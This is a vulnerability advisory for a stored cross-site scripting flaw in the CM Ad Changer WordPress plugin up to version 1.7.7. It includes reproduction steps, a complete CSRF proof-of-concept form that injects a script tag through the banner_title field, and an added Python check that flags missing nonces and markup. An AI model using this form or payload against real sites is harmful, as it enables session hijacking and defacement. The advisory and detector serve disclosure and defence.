CM Ad Changer <= 1.7.7 - Stored Cross-Site Scripting (XSS)

A stored cross-site scripting (XSS) vulnerability was reported by the author to CM Ad Plugins. An unprivileged user can trigger the stored XSS to perform malicious actions, or an attacker can send a crafted link (CSRF) that triggers it.
Proof of Concept
1) Go to CM Ad changers -> Campaigns

2) Create a campaign. Enter whatever you want in Campaign settings. In the next tab, "Campaign Banners", select an image in Campaign images, and in Banner Title enter this payload

3) Click Save. The payload triggers every time you return.

An attacker can make a payload file containing the following:

    <h1> Click The button below. POC By Aaditya Purani:: CM AD Changer 1.7.7 </h1>   
    <form action="{TARGET_ID}" method="POST">
      <input type="hidden" name="campaign_id" value="1" />
      <input type="hidden" name="title" value="Hacked by Aaditya" />
      <input type="hidden" name="comment" value="" />
      <input type="hidden" name="link" value="" />
      <input type="hidden" name="status" value="on" />
      <input type="hidden" name="banner_display_method" value="selected" />
      <input type="hidden" name="banner_filename[]" value="yourpicvalue.jpg" />
      <input type="hidden" name="banner_title[]" value="</script><script>confirm(/aaditya/)</script>" />
      <input type="hidden" name="banner_title_tag[]" value="" />
      <input type="hidden" name="banner_tag[]" value="" />
      <input type="hidden" name="banner_link[]" value="" />
      <input type="hidden" name="banner_weight[]" value="0" />
      <input type="hidden" name="selected_banner" value="yourpicvalue.jpg" />
      <input type="hidden" name="submit" value="Save" />
      <input type="submit" value="Submit request" />
    </form>

This triggers the stored XSS through the banner_title parameter.
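A defender-side check for the request described above, as an added example that is not part of the original advisory or the plugin's code. It audits a campaign-save request body for the two conditions the advisory combines (no anti-CSRF token, markup in a free-text field) and shows the encoded form of a stored title. The `_wpnonce` field name, the function names and the sample bodies are assumptions made for illustration.

```python
import html
import re
from urllib.parse import parse_qs, urlencode

# Free-text fields from the advisory's form; banner_title[] is the reported sink.
TEXT_FIELDS = ("title", "comment", "banner_title[]", "banner_title_tag[]")
# Assumption: a patched handler requires a WordPress nonce
# ("_wpnonce" is WordPress's default nonce field name).
NONCE_FIELD = "_wpnonce"
MARKUP = re.compile(r"[<>]")


def audit_campaign_post(body):
    """Return findings for one urlencoded campaign-save request body."""
    params = parse_qs(body, keep_blank_values=True)
    findings = []
    # Presence only: whether the nonce is valid can be decided by the server alone.
    if not params.get(NONCE_FIELD, [""])[0]:
        findings.append("no nonce: request may be a cross-site forgery")
    for field in TEXT_FIELDS:
        for value in params.get(field, []):
            if MARKUP.search(value):
                findings.append(f"{field}: angle brackets in {value!r}")
    return findings


def encode_for_html(value):
    """Encode a stored title for HTML text or a quoted attribute value.

    This is not sufficient for a value written inside an inline <script> block.
    """
    return html.escape(value, quote=True)


# Constructed sample bodies (not captured traffic); the marker string is inert.
SAMPLE_FORGED = urlencode([
    ("campaign_id", "1"), ("title", "Spring sale"),
    ("banner_filename[]", "banner.jpg"),
    ("banner_title[]", "</script><i>probe</i>"), ("submit", "Save"),
])
SAMPLE_CLEAN = urlencode([
    ("_wpnonce", "a1b2c3d4e5"), ("campaign_id", "1"), ("title", "Spring sale"),
    ("banner_title[]", "Spring banner"), ("submit", "Save"),
])

if __name__ == "__main__":
    for name, body in (("forged", SAMPLE_FORGED), ("clean", SAMPLE_CLEAN)):
        print(name, audit_campaign_post(body))
    print(encode_for_html("</script><i>probe</i>"))
```
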

Affects Plugin

Fixed in version 1.7.8




Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)


Submitter Aaditya Purani
Submitter Twitter aaditya_purani
Verified No


Publicly Published 2016-06-09 (about 4 years ago)
Added 2016-06-13 (about 4 years ago)
Last Updated 2019-11-01 (8 months ago)
